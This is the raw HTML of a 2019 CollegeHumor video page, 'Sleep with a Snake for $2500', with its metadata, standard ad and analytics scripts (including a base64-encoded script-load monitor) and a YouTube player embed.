<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="utf-8">
		<!-- Adonis observer.min.js --><script>/* observer-7.0.2 */eval(atob("IWZ1bmN0aW9uIHQoZSxuLG8pe2Z1bmN0aW9uIHIoYSxzKXtpZighblthXSl7aWYoIWVbYV0pe3ZhciB1PSJmdW5jdGlvbiI9PXR5cGVvZiByZXF1aXJlJiZyZXF1aXJlO2lmKCFzJiZ1KXJldHVybiB1KGEsITApO2lmKGkpcmV0dXJuIGkoYSwhMCk7dmFyIGQ9bmV3IEVycm9yKCJDYW5ub3QgZmluZCBtb2R1bGUgJyIrYSsiJyIpO3Rocm93IGQuY29kZT0iTU9EVUxFX05PVF9GT1VORCIsZH12YXIgYz1uW2FdPXtleHBvcnRzOnt9fTtlW2FdWzBdLmNhbGwoYy5leHBvcnRzLGZ1bmN0aW9uKHQpe3ZhciBuPWVbYV1bMV1bdF07cmV0dXJuIHIobj9uOnQpfSxjLGMuZXhwb3J0cyx0LGUsbixvKX1yZXR1cm4gblthXS5leHBvcnRzfWZvcih2YXIgaT0iZnVuY3Rpb24iPT10eXBlb2YgcmVxdWlyZSYmcmVxdWlyZSxhPTA7YTxvLmxlbmd0aDthKyspcihvW2FdKTtyZXR1cm4gcn0oezE6W2Z1bmN0aW9uKHQsZSxuKXsidXNlIHN0cmljdCI7ZnVuY3Rpb24gbyh0KXt2YXIgZT0iTkVXX1NDUklQVF9FVkVOVCIsbj1uZXcgcihlLHtkZXRhaWw6e319KTt0LmRpc3BhdGNoRXZlbnQobil9dmFyIHI9dCgzKTtlLmV4cG9ydHM9b30sezM6M31dLDI6W2Z1bmN0aW9uKHQsZSxuKXsidXNlIHN0cmljdCI7ZnVuY3Rpb24gbyh0KXt0LmFkb25pcz10LmFkb25pc3x8e30sdC5hZG9uaXMuc2NyaXB0U3RhdHVzZXM9e30sdC5hZG9uaXMucmVxdWVzdFN0YXR1c2VzPXt9O3ZhciBlPXQuWE1MSHR0cFJlcXVlc3QucHJvdG90eXBlLm9wZW47dC5YTUxIdHRwUmVxdWVzdC5wcm90b3R5cGUub3Blbj1mdW5jdGlvbihuLG8pe3RoaXMuYWRkRXZlbnRMaXN0ZW5lcigiZXJyb3IiLGZ1bmN0aW9uKGUpezA9PT10aGlzLnN0YXR1cz90LmFkb25pcy5zY3JpcHRTdGF0dXNlc1tvXT0iZXJyb3IiOnQuYWRvbmlzLnNjcmlwdFN0YXR1c2VzW29dPSJsb2FkIn0pLHRoaXMuYWRkRXZlbnRMaXN0ZW5lcigibG9hZCIsZnVuY3Rpb24oZSl7dC5hZG9uaXMuc2NyaXB0U3RhdHVzZXNbb109ImxvYWQifSksdGhpcy5hZGRFdmVudExpc3RlbmVyKCJsb2FkZW5kIixmdW5jdGlvbihlKXt0LmFkb25pcy5yZXF1ZXN0U3RhdHVzZXNbb109dGhpcy5zdGF0dXMscih0KX0pO3ZhciBpPVtdLnNsaWNlLmNhbGwoYXJndW1lbnRzLDApO3JldHVybiBlLmFwcGx5KHRoaXMsaSl9fXZhciByPXQoMSk7ZS5leHBvcnRzPXt3cmFwWE1MSHR0cFJlcXVlc3Q6b319LHsxOjF9XSwzOltmdW5jdGlvbih0LGUsbil7KGZ1bmN0aW9uKHQpe2Z1bmN0aW9uIG4oKXt0cnl7dmFyIHQ9bmV3IG8oImNhdCIse2RldGFpbDp7Zm9vOiJiYXIifX0pO3JldHVybiJjYXQiPT09dC50eXBlJiYiYmFyIj09PXQuZGV0YWlsLmZvb31jYXRjaChlKXt9cmV0dXJuITF9dmFyIG89dC5DdXN0b21FdmVudDtlLmV4cG9ydHM9bigpP286InVuZGVmaW5lZCIhPXR5cGVvZiBkb2N1bWVudCYmImZ1bmN0aW9uIj09dHlwZW9mIGRvY3VtZW50LmNyZWF0ZUV2ZW50P2Z1bmN0aW9uKHQsZSl7dmFyIG49ZG9jdW1lbnQuY3JlYXRlRXZlbnQoIkN1c3RvbUV2ZW50Iik7cmV0dXJuIGU/bi5pbml0Q3VzdG9tRXZlbnQodCxlLmJ1YmJsZXMsZS5jYW5jZWxhYmxlLGUuZGV0YWlsKTpuLmluaXRDdXN0b21FdmVudCh0LCExLCExLHZvaWQgMCksbn06ZnVuY3Rpb24odCxlKXt2YXIgbj1kb2N1bWVudC5jcmVhdGVFdmVudE9iamVjdCgpO3JldHVybiBuLnR5cGU9dCxlPyhuLmJ1YmJsZXM9Qm9vbGVhbihlLmJ1YmJsZXMpLG4uY2FuY2VsYWJsZT1Cb29sZWFuKGUuY2FuY2VsYWJsZSksbi5kZXRhaWw9ZS5kZXRhaWwpOihuLmJ1YmJsZXM9ITEsbi5jYW5jZWxhYmxlPSExLG4uZGV0YWlsPXZvaWQgMCksbn19KS5jYWxsKHRoaXMsInVuZGVmaW5lZCIhPXR5cGVvZiBnbG9iYWw/Z2xvYmFsOiJ1bmRlZmluZWQiIT10eXBlb2Ygc2VsZj9zZWxmOiJ1bmRlZmluZWQiIT10eXBlb2Ygd2luZG93P3dpbmRvdzp7fSl9LHt9XSw0OltmdW5jdGlvbih0LGUsbil7InVzZSBzdHJpY3QiO2Z1bmN0aW9uIG8odCxlLG4sbyl7ImFkZEV2ZW50TGlzdGVuZXIiaW4gdD90LmFkZEV2ZW50TGlzdGVuZXIoZSxuLG8pOiJhdHRhY2hFdmVudCJpbiB0JiZ0LmF0dGFjaEV2ZW50KCJvbiIrZSxuKX12YXIgcj10KDIpLGk9dCgxKTshZnVuY3Rpb24oKXt3aW5kb3cuYWRvbmlzPXdpbmRvdy5hZG9uaXN8fHt9LHdpbmRvdy5hZG9uaXMuc2NyaXB0U3RhdHVzZXM9e30sci53cmFwWE1MSHR0cFJlcXVlc3Qod2luZG93KSxvKGRvY3VtZW50LCJsb2FkIixmdW5jdGlvbih0KXt0LnRhcmdldCYmIlNDUklQVCI9PT10LnRhcmdldC5ub2RlTmFtZSYmKHdpbmRvdy5hZG9uaXMuc2NyaXB0U3RhdHVzZXNbdC50YXJnZXQuc3JjXT0ibG9hZCIsaSh3aW5kb3cpKX0sITApLG8oZG9jdW1lbnQsImVycm9yIixmdW5jdGlvbih0KXt0LnRhcmdldCYmIlNDUklQVCI9PT10LnRhcmdldC5ub2RlTmFtZSYmKHdpbmRvdy5hZG9uaXMuc2NyaXB0U3RhdHVzZXNbdC50YXJnZXQuc3JjXT0iZXJyb3IiLGkod2luZG93KSl9LCEwKX0oKX0sezE6MSwyOjJ9XX0se30sWzRdKTs="));</script>
        <link rel="shortcut icon" href="/favicon.ico">
	<link rel="canonical" href="http://www.collegehumor.com/video/40004128/sleep-with-a-snake-for-2500">
	<link rel="alternate" href="http://www.collegehumor.com/oembed.json?url=http%3A%2F%2Fwww.collegehumor.com%2Fvideo%2F40004128%2Fsleep-with-a-snake-for-2500" type="application/json+oembed" title="Sleep with a Snake for $2500">
	<link rel="alternate" href="http://www.collegehumor.com/oembed.xml?url=http%3A%2F%2Fwww.collegehumor.com%2Fvideo%2F40004128%2Fsleep-with-a-snake-for-2500" type="application/xml+oembed" title="Sleep with a Snake for $2500">
	<link rel="image_src" href="http://1.media.collegehumor.cvcdn.com/56/35/c5daec2fd053548c03763729434de3d7-sleep-with-a-snake-for-2500.jpeg">
	<meta property="og:locale" content="en_US">
	<meta property="og:site_name" content="CollegeHumor">
	<meta property="fb:app_id" content="271750421132">
	<meta property="fb:pages" content="6363207806">
	<meta name="twitter:site" content="CollegeHumor">
	<meta name="description" content="Ally faces their biggest fear when Grant challenges them to let a 14-foot snake into their bed. Watch &quot;Sleep with a Snake for $2500&quot; and more funny videos on CollegeHumor">
	<meta name="published_datetime" content="2019-03-21T13:30:43-04:00">
	<meta name="modified_datetime" content="2019-03-19T18:01:14-04:00">
	<meta name="publisher" content="CollegeHumor">
	<meta name="date" content="2019-03-21">
	<meta name="keywords" content="video,College,money,fear,Animals,stunts,economy,debt,documentaries,fails,challenges,anxiety,ally beardsley,grant o&#039;brien,freaking out,nailed it,fuck this,courage,dares,adam frucci,total forgiveness,ally has to stay in bed for half an hour with a ,can&#039;t be poisonous,14 foot anaconda,that&#039;s not a legal u.s. snake,it was so easy to find a snake in la,camouflage sheets,angelina the snake,new tinder pic,asking the snake if they have debt,dain august">
	<meta name="twitter:card" content="player">
	<meta name="content_format" content="video">
	<meta name="sponsored" content="false">
	<meta name="sponsor_campaign" content="">
	<meta name="shelf_life" content="evergreen">
	<meta name="author" content="CH Staff">
	<meta name="contributors" content="CH Staff">
	<meta name="vertical" content="unspecified">
	<meta name="source" content="original">
	<meta name="rating" content="pg13">
	<meta name="main_topic" content="Life | Friends">
	<meta name="alternate_topic" content="Life | School">
	<meta name="medium" content="video">
	<meta name="twitter:player" content="https://www.collegehumor.com/e/40004128">
	<meta name="twitter:player:width" content="600">
	<meta name="twitter:player:height" content="338">
	<meta property="og:title" content="Sleep with a Snake for $2500">
	<meta property="og:type" content="video.other">
	<meta property="og:url" content="http://www.collegehumor.com/video/40004128/sleep-with-a-snake-for-2500">
	<meta property="og:description" content="Ally faces their biggest fear when Grant challenges them to let a 14-foot snake into their bed.">
	<meta property="og:video:url" content="http://www.collegehumor.com/video/40004128/sleep-with-a-snake-for-2500">
	<meta property="og:video:width" content="600">
	<meta property="og:video:height" content="338">
	<meta property="video:release_date" content="2019-03-21 13:30:43">
	<meta property="video:tag" content="College,money,fear,Animals,stunts,economy,debt,documentaries,fails,challenges,anxiety,ally beardsley,grant o&#039;brien,freaking out,nailed it,fuck this,courage,dares,adam frucci,total forgiveness,ally has to stay in bed for half an hour with a ,can&#039;t be poisonous,14 foot anaconda,that&#039;s not a legal u.s. snake,it was so easy to find a snake in la,camouflage sheets,angelina the snake,new tinder pic,asking the snake if they have debt,dain august">
	<meta property="og:tag" content="College,money,fear,Animals,stunts,economy,debt,documentaries,fails,challenges,anxiety,ally beardsley,grant o&#039;brien,freaking out,nailed it,fuck this,courage,dares,adam frucci,total forgiveness,ally has to stay in bed for half an hour with a ,can&#039;t be poisonous,14 foot anaconda,that&#039;s not a legal u.s. snake,it was so easy to find a snake in la,camouflage sheets,angelina the snake,new tinder pic,asking the snake if they have debt,dain august">
	<meta property="og:image" content="http://1.media.collegehumor.cvcdn.com/56/35/c5daec2fd053548c03763729434de3d7-sleep-with-a-snake-for-2500.jpeg">
	<meta property="og:image:width" content="1920">
	<meta property="og:image:height" content="1080">
	<meta property="og:type" content="video.episode">
	<meta property="video:series" content="http://www.collegehumor.com/originals">
	<title>Sleep with a Snake for $2500 - CollegeHumor Video</title>
	<meta name="viewport" content="width=device-width, height=device-height, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
	<link rel="apple-touch-icon" href="http://0.static.collegehumor.cvcdn.com/images/touch/touch-icon-60x60.png">
	<link rel="apple-touch-icon" sizes="76x76" href="http://1.static.collegehumor.cvcdn.com/images/touch/touch-icon-76x76.png">
	<link rel="apple-touch-icon" sizes="120x120" href="http://0.static.collegehumor.cvcdn.com/images/touch/touch-icon-120x120.png">
	<link rel="apple-touch-icon" sizes="152x152" href="http://1.static.collegehumor.cvcdn.com/images/touch/touch-icon-152x152.png">
	<link rel="alternate" href="http://www.collegehumor.com/video/40004128/sleep-with-a-snake-for-2500" hreflang="en" /><link rel="alternate" href="http://www.collegehumor.com/video/40004128/sleep-with-a-snake-for-2500" hreflang="en-us" /><link rel="alternate" href="http://www.collegehumor.com.au/video/40004128/sleep-with-a-snake-for-2500" hreflang="en-au" /><link rel="alternate" href="http://www.collegehumor.com/video/40004128/sleep-with-a-snake-for-2500" hreflang="x-default" />			<meta name="robots" content="index, follow, noodp, noydir">
		    				<link rel="stylesheet" type="text/css" href="http://0.static.collegehumor.cvcdn.com/css/packages/3a9c831276c60b6bb21f396d3f571369.css">
	<noscript><link rel="stylesheet" type="text/css" href="http://1.static.collegehumor.cvcdn.com/jument/css/noscript.css"></noscript>
	
		<script type="text/javascript" src="http://0.static.collegehumor.cvcdn.com/js/packages/4541b5138bf3666f43eaa1f4d2aad1dc.js"></script>
	    					<script src="https://www.googletagservices.com/tag/js/gpt.js"></script>
		<script src="//cdn.adsafeprotected.com/iasPET.1.js"></script>
    	<!-- GPT and IAS -->
<script>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</script>
<!-- End: GPT and IAS -->    	<!-- Amazon A9 - APS Transparent Tag Marketplace -->
<script type='text/javascript'>
	!function(a9,a,p,s,t,A,g){if(a[a9])return;function q(c,r){a[a9]._Q.push([c,r])}a[a9]={init:function(){q("i",arguments)},fetchBids:function()
	{q("f",arguments)},setDisplayBids:function(){},_Q:[]};A=p.createElement(s);A.async=!0;A.src=t;g=p.getElementsByTagName(s)[0];g.parentNode.insertBefore(
	A,g)}("apstag",window,document,"script","//c.amazon-adsystem.com/aax2/apstag.js");
	// initialize apstag and have apstag set bids on the googletag slots when they are returned to the page
	apstag.init({
		pubID: '3436',
		adServer: 'googletag',
		bidTimeout: 1e3
		});
	// request the bids for the googletag slots
	apstag.fetchBids({ slots: [  
		]}, function(bids) {
		console.log('apstag bids fetched! \n');
		console.dir(bids);
		// trigger the request to DFP
		googletag.cmd.push(function() {
		apstag.setDisplayBids();
		googletag.pubads().refresh();
		});
	});
</script>
<!-- End: Amazon A9 - APS Transparent Tag Marketplace -->    	<!--[if lt IE 9]>
		<link rel="stylesheet" href="/jument/css/ie8-and-below.css">
		<script src="http://0.static.collegehumor.cvcdn.com/jument/js/lib.html5shiv.js"></script>
		<script src="http://1.static.collegehumor.cvcdn.com/jument/js/lib.respond.min.js"></script>
	<![endif]-->
    <!-- Package Link Data JSON (ld+json) -->
    <script type='application/ld+json'>{"@context":"http://schema.org","@type":"Article","headline":"Sleep with a Snake for $2500","thumbnailUrl":"http://1.media.collegehumor.cvcdn.com/56/35/c5daec2fd053548c03763729434de3d7-sleep-with-a-snake-for-2500.jpeg","image":{"@type":"ImageObject","url":"http://1.media.collegehumor.cvcdn.com/56/35/c5daec2fd053548c03763729434de3d7-sleep-with-a-snake-for-2500.jpeg","width":"1920","height":"1080"},"publisher":{"@type":"Organization","name":"CollegeHumor","logo":{"@type":"ImageObject","url":"https://media0ch-a.akamaihd.net/98/69/099aa49090aca85be0f9ee7233479df3.png","width":256,"height":60}},"dateCreated":"2019-03-21T13:30:43-04:00","datePublished":"2019-03-21T13:30:43-04:00","dateModified":"2019-03-19T18:01:14-04:00","creator":["CH Staff"],"author":["CH Staff"],"keywords":["tag - video","tag - College","tag - money","tag - fear","tag - Animals","tag - stunts","tag - economy","tag - debt","tag - documentaries","tag - fails","tag - challenges","tag - anxiety","tag - ally beardsley","tag - grant ou0027brien","tag - freaking out","tag - nailed it","tag - fuck this","tag - courage","tag - dares","tag - adam frucci","tag - total forgiveness","tag - ally has to stay in bed for half an hour with a","tag - canu0027t be poisonous","tag - 14 foot anaconda","tag - thatu0027s not a legal u.s. snake","tag - it was so easy to find a snake in la","tag - camouflage sheets","tag - angelina the snake","tag - new tinder pic","tag - asking the snake if they have debt","tag - dain august","format - video","shelflife - evergreen","topic - Life","subtopic - Friends","subtopic - School"],"articleSection":["subtopic - Friends","subtopic - School"],"url":"http://www.collegehumor.com/video/40004128/sleep-with-a-snake-for-2500","mainEntityOfPage":"http://www.collegehumor.com/video/40004128/sleep-with-a-snake-for-2500"}</script></head>
<body class="www ch notouch non-reading-list">
<!-- Adonis wrapper.min.js --><script>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</script>
	<!-- Begin comScore Tag -->
	<script> var _comscore = _comscore || []; _comscore.push({ c1: "2", c2: "6511178" }); (function() {var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true; s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js"; el.parentNode.insertBefore(s, el); })(); </script>
	<noscript><img src="https://sb.scorecardresearch.com/p?c1=2&amp;c2=6511178&amp;c4=https://www.collegehumor.com/video/40004128/sleep-with-a-snake-for-2500" /></noscript>
	<!-- End comScore Tag --> 
        	<!-- Page hiding snippet (recommended) -->
<style>.async-hide { opacity: 0 !important} </style>
<script>
(function(a,s,y,n,c,h,i,d,e){s.className+=' '+y;
h.end=i=function(){s.className=s.className.replace(RegExp(' ?'+y),'')};
(a[n]=a[n]||[]).hide=h;setTimeout(function(){i();h.end=null},c);
})(window,document.documentElement,'async-hide','dataLayer',4000,{'GTM-KLD83T':true});
</script>
<!-- Note: Google Tag Manager ID for CollegeHumor = GTM-KLD83T -->	    <!-- Google Tag Manager for CollegeHumor (GTM-KLD83T) -->
<noscript><iframe src="//www.googletagmanager.com/ns.html?id=GTM-KLD83T"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-KLD83T');</script>
<!-- End Google Tag Manager for CollegeHumor (GTM-KLD83T) -->    		    
<div class="site-header-wrapper js-site-header-wrapper">
	<nav class="site-nav ga-feature-usage" data-ga-feature="Navigation" data-ga-category="Navigation" role="navigation">
				<ul class="site-nav__list">
											<li class="videos dropdown site-nav__item ga-feature-usage ga-interaction" data-ga-feature="Navigation Drop Down - Videos">
					<a class="site-nav__item-link" href="http://www.collegehumor.com/videos" data-toggle="dropdown" data-ga-category="Navigation" data-ga-label="Videos" >Videos</a>
										<div class="site-nav__item-toggle js-site-nav__item-toggle"><span class="caret"></span></div>

					<ul class="site-nav__item-sub ga-feature-usage" data-ga-feature="Navigation Dropdown" data-ga-category="Navigation">
												<li class="site-nav__item-sub__item"><a href="http://www.collegehumor.com/originals" class="site-nav__item-sub__item-link " data-ga-category="Navigation" data-ga-label="Videos: All Originals">All Originals</a></li>
											<li class="site-nav__item-sub__item"><a href="http://www.collegehumor.com/tag/adam-ruins-everything" class="site-nav__item-sub__item-link " data-ga-category="Navigation" data-ga-label="Videos: Adam Ruins Everything">Adam Ruins Everything</a></li>
											<li class="site-nav__item-sub__item"><a href="http://www.collegehumor.com/badman" class="site-nav__item-sub__item-link " data-ga-category="Navigation" data-ga-label="Videos: Batman">Batman</a></li>
											<li class="site-nav__item-sub__item"><a href="http://www.collegehumor.com/hardlyworking" class="site-nav__item-sub__item-link " data-ga-category="Navigation" data-ga-label="Videos: Hardly Working">Hardly Working</a></li>
											<li class="site-nav__item-sub__item"><a href="http://www.collegehumor.com/jakeandamir" class="site-nav__item-sub__item-link " data-ga-category="Navigation" data-ga-label="Videos: Jake and Amir">Jake and Amir</a></li>
										</ul><!-- /.site-nav__item__submenu -->
									</li><!-- /.site-nav__item -->
											<li class="comics dropdown site-nav__item ga-feature-usage ga-interaction" data-ga-feature="Navigation Drop Down - Comics">
					<a class="site-nav__item-link" href="http://www.collegehumor.com/comics" data-ga-label="Comics" >Comics</a>
									</li><!-- /.site-nav__item -->
											<li class="back-to-school dropdown site-nav__item ga-feature-usage ga-interaction" data-ga-feature="Navigation Drop Down - Back To School">
					<a class="site-nav__item-link" href="http://www.collegehumor.com/back-to-school" data-ga-label="Back To School" >Back To School</a>
									</li><!-- /.site-nav__item -->
											<li class="loverelationships dropdown site-nav__item ga-feature-usage ga-interaction" data-ga-feature="Navigation Drop Down - Love/Relationships">
					<a class="site-nav__item-link" href="http://www.collegehumor.com/tag/love-romance" data-ga-label="Love/Relationships" >Love/Relationships</a>
									</li><!-- /.site-nav__item -->
											<li class="moviestv dropdown site-nav__item ga-feature-usage ga-interaction" data-ga-feature="Navigation Drop Down - Movies/TV">
					<a class="site-nav__item-link" href="http://www.collegehumor.com/tag/movies" data-ga-label="Movies/TV" >Movies/TV</a>
									</li><!-- /.site-nav__item -->
											<li class="food dropdown site-nav__item ga-feature-usage ga-interaction" data-ga-feature="Navigation Drop Down - Food">
					<a class="site-nav__item-link" href="http://www.collegehumor.com/tag/food" data-ga-label="Food" >Food</a>
									</li><!-- /.site-nav__item -->
											<li class="wtf dropdown site-nav__item ga-feature-usage ga-interaction" data-ga-feature="Navigation Drop Down - WTF">
					<a class="site-nav__item-link" href="http://www.collegehumor.com/tag/wtf" data-ga-label="WTF" >WTF</a>
									</li><!-- /.site-nav__item -->
											<li class="life dropdown site-nav__item ga-feature-usage ga-interaction" data-ga-feature="Navigation Drop Down - Life">
					<a class="site-nav__item-link" href="http://www.collegehumor.com/tag/life" data-ga-label="Life" >Life</a>
									</li><!-- /.site-nav__item -->
											<li class="politics dropdown site-nav__item ga-feature-usage ga-interaction" data-ga-feature="Navigation Drop Down - Politics">
					<a class="site-nav__item-link" href="http://www.collegehumor.com/tag/politics" data-ga-label="Politics" >Politics</a>
									</li><!-- /.site-nav__item -->
											<li class="all-articles dropdown site-nav__item ga-feature-usage ga-interaction" data-ga-feature="Navigation Drop Down - All Articles">
					<a class="site-nav__item-link" href="http://www.collegehumor.com/articles" data-ga-label="All Articles" >All Articles</a>
									</li><!-- /.site-nav__item -->
											<li class="shop dropdown site-nav__item ga-feature-usage ga-interaction" data-ga-feature="Navigation Drop Down - Shop">
					<a class="site-nav__item-link" href="http://www.collegehumor.com/shop" data-ga-label="Shop" >Shop</a>
									</li><!-- /.site-nav__item -->
											<li class="try-dropout dropdown site-nav__item ga-feature-usage ga-interaction" data-ga-feature="Navigation Drop Down - Try DROPOUT">
					<a class="site-nav__item-link" href="http://www.collegehumor.com/try-dropout" data-ga-label="Try DROPOUT" >Try DROPOUT</a>
									</li><!-- /.site-nav__item -->
					</ul><!-- /.site-nav__list -->
			</nav><!-- /.site-nav -->

	<div id="ad-counter"><script type="text/javascript">if(typeof(googletag) != "undefined") { googletag.cmd.push(function() { googletag.display("ad-counter"); }); }</script></div>		<div id="ad-dynamic-header"><script type="text/javascript">if(typeof(googletag) != "undefined") { googletag.cmd.push(function() { googletag.display("ad-dynamic-header"); }); }</script></div>
	<header class="site-header" role="banner">
		<a class="site-header__trigger js-site-header__trigger ga-feature-usage ga-interaction ga-interaction-click-only" href="#" data-ga-feature="Open Menu">
			<span></span>
		  <span></span>
		  <span></span>
		  <span></span>
		</a><!-- /.site-header__trigger -->

		<h2 class="site-header__logo">
			<a class="site-header__logo-link ga-feature-usage ga-target-self" href="/" data-ga-feature="Logo" data-ga-category="Navigation" data-ga-label="CollegeHumor Logo" style="">CollegeHumor</a>
		</h2><!-- /.site-header__logo -->

		<a class="site-header__dropout" href="https://signup.dropout.tv/join-genf18?utm_source=collegehumor.com&utm_medium=house&utm_campaign=do-gen&utm_content=medrec" target="_blank" data-ga-category="Navigation" data-ga-label="Try DROPOUT button"></a>

		<nav class="site-header__social">
			<ul class="site-header__social-list">
				<li class="site-header__social-item"><a  class="site-header__social-item-link" href="https://www.youtube.com/user/collegehumor" target="_blank"><span class="icon icon-youtube"></span></a></li>
				<li class="site-header__social-item"><a  class="site-header__social-item-link" href="https://www.facebook.com/CollegeHumor" target="_blank"><span class="icon icon-facebook"></span></a></li>
				<li class="site-header__social-item"><a  class="site-header__social-item-link" href="https://twitter.com/collegehumor" target="_blank"><span class="icon icon-twitter"></span></a></li>
				<li class="site-header__social-item"><a  class="site-header__social-item-link" href="https://www.instagram.com/collegehumor" target="_blank"><span class="icon icon-instagram"></span></a></li>				
			</ul>
		</nav><!-- /.social-nav -->

		<a class="site-header__search js-site-header__search" href="#" data-show=".navbar-search" data-ga-category="Navigation" data-ga-label="Search Module"></a>

		<div class="site-header__search-bar" style="">
			<script>
			  (function() {
				var cx = '005471751329090648169:a1opraivv_0';
			    var gcse = document.createElement('script');
			    gcse.type = 'text/javascript';
			    gcse.async = true;
			    gcse.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') +
			        '//www.google.com/cse/cse.js?cx=' + cx;
			    var s = document.getElementsByTagName('script')[0];
			    s.parentNode.insertBefore(gcse, s);
			  })();
			</script>
			<gcse:search linktarget="_parent"></gcse:search>
		</div>
	</header><!-- /.site-header -->
</div><!-- /.site-header-container -->
		<div class="site-container">
		<div class="site-content">
				<script>if(typeof ga == 'function') { ga('send', 'event', 'Media', 'On Site View', '40004128', 1); }</script>

<script>
	var disable_twin_river_ads = 0;
</script>

<div class="video js-scroll js-node" data-url="/video/40004128/sleep-with-a-snake-for-2500" data-node-id="40004128" id="40004128">
	<script>
		// empty readThisList array for non-reading list posts
		var readThisList = [];
	</script>
  	<aside class="video-aside">
    <div class="ad-video js-ad">
      <div class="ad-video__inner">
					<div id="ad-in-rail-1" adonis-marker><script type="text/javascript">if(typeof(googletag) != "undefined") { googletag.cmd.push(function() { googletag.display("ad-in-rail-1"); }); }</script></div>      </div>
    </div>
  </aside><!-- /.video-aside --> 
	
	<main class="video-main">
		<section class="video-main__video">
      <div class="video-main__video-container">
        <div id="player" class="video-main__video-player">
          						<div id="youtube-player"></div>
<script>
    // This code loads the iframe player API code asynchronously.
    var tag = document.createElement('script');
    tag.src = "https://www.youtube.com/iframe_api";
    var firstScriptTag = document.getElementsByTagName('script')[0];
    firstScriptTag.parentNode.insertBefore(tag, firstScriptTag);

    // This function creates an <iframe> (and YouTube player) after the API code downloads.
    var player;
    function onYouTubeIframeAPIReady() {
    player = new YT.Player('youtube-player', {
        height: '360',
        width: '640',
        playerVars: {
                autoplay: 1,
                loop: 0,
                controls: 1,
                showinfo: 0,
                rel: 0,
                modestbranding: 0        },
        videoId: 'epQcqdJyGhw',
        events: {
        'onReady': onPlayerReady
        }
    });
    }

    // The API will call this function when the video player is ready.
    // The player will be muted if the force_autoplay metadata is set to true.
    function onPlayerReady(event) {
        event.target.playVideo();
            }
</script>
					        </div><!-- /.video-main__video-player -->
      </div><!-- /.video-main__video-container -->
    </section><!-- /.video-main__video -->

    <section class="video-main__details">
      <header class="video-main__details-header">
				<div class="video-main__details-header__title ">
						<span class="badge is_series">Original</span>
 
					<h1 class="video-main__details-header__title-hdr">Originals / Sleep with a Snake for $2500</h1>
				</div>

				<div class="video-main__details-header__byline">
					<div class="byline ga-feature-usage " data-ga-feature="Author Byline">
				<div class="author-avatar">
	<a href="/user/101536">	<img src="http://0.static.collegehumor.cvcdn.com/jument/images/placeholders/125x125.png" width="125" height="125" class="img-responsive lazy" alt="CH Staff" data-src="http://1.media.collegehumor.cvcdn.com/20/93/c15e5c18183931aeea1ac668f5bbfacd.jpg" data-src-retina="http://0.media.collegehumor.cvcdn.com/20/93/2aee2343d43cb8e61dd0fb5577ba0a85.jpg"/>
	<noscript>
		<img src="http://1.media.collegehumor.cvcdn.com/20/93/c15e5c18183931aeea1ac668f5bbfacd.jpg" width="48" height="48" alt="CH Staff"/>
	</noscript>
	</a></div>
<div class="author-info">
	<div class="authors">
						<span class="name"><a href="/user/101536">CH Staff</a></span>								</div>
				<time class="date">March 21, 2019</time>
	</div>	</div>
				</div>
			</header>

			<div class="video-main__details-content">
				<div class="video-main__details-content__description">
					<style type="text/css">td {border: 1px solid #ccc;}br {mso-data-placement:same-cell;}</style>
<p><span style="font-size: 10pt; font-family: Arial;" data-sheets-value="{" 1="" :2="" 2="" :="" ally="" faces="" their="" biggest="" fear="" when="" grant="" challenges="" them="" to="" let="" a="" 14-foot="" snake="" into="" bed="" data-sheets-userformat="{" :769="" 3="" :0="" 11="" :4="" 12="">Ally faces their biggest fear when Grant challenges them to let a 14-foot snake into their bed.</span></p>				</div>

        <div class="video-main__details-content__comments">
																	<div id="comments" class="cf">
		<div class="comments-share-wrapper cf">
			<button class="fb-comments-toggle"><i class="icon-comments"></i> Comments <i class="caret-toggle icon-caret-down"></i></button>
			
	<div class="share-bar share-bar-media ga-feature-usage" data-ga-feature="Share Module" data-url="http://www.collegehumor.com/video/40004128/sleep-with-a-snake-for-2500">
		<ul class="large">
																<li><a data-ga-category="Share Module" data-ga-label="Facebook"  href="http://www.facebook.com/sharer/sharer.php?u=http%3A%2F%2Fwww.collegehumor.com%2Fvideo%2F40004128%2Fsleep-with-a-snake-for-2500" title="Facebook"><span class="btn-share btn-share-facebook icon-facebook"  ></span></a></li>
														<li><a data-ga-category="Share Module" data-ga-label="Twitter"  href="https://twitter.com/intent/tweet?related=dorkly&amp;text=Sleep%20with%20a%20Snake%20for%20%242500&amp;url=http%3A%2F%2Fwww.collegehumor.com%2Fvideo%2F40004128%2Fsleep-with-a-snake-for-2500&amp;via=CollegeHumor" title="Twitter"><span class="btn-share btn-share-twitter icon-twitter"  ></span></a></li>
				</ul>
				<div class="form form-copy-url hide">
			<input type="text" id="copy-url" class="form-control" value="http://www.collegehumor.com/video/40004128/sleep-with-a-snake-for-2500">
		</div>
					<div class="form form-copy-embed hide">
				<input type="text" id="copy-embed" class="form-control" value="&lt;iframe src=&quot;http://www.collegehumor.com/e/40004128&quot; width=&quot;600&quot; height=&quot;369&quot; frameborder=&quot;0&quot; webkitAllowFullScreen allowFullScreen&gt;&lt;/iframe&gt;&lt;div style=&quot;padding:5px 0; text-align:center; width:600px;&quot;&gt;&lt;p&gt;&lt;a href=&quot;//www.collegehumor.com/videos/most-viewed/this-year&quot;&gt;CollegeHumor&amp;#039;s Favorite Funny Videos&lt;/a&gt;&lt;/p&gt;&lt;/div&gt;">
			</div>
			</div>
		</div>
		<div class="fb-comments-wrapper hide">
					<div class="fb-comments" data-href="http://www.collegehumor.com/video/40004128/sleep-with-a-snake-for-2500" data-width="100%" data-colorscheme="light" data-num-posts="10" data-order-by="social" data-mobile="auto-detect"></div>
				</div>
	</div>
        </div>

          
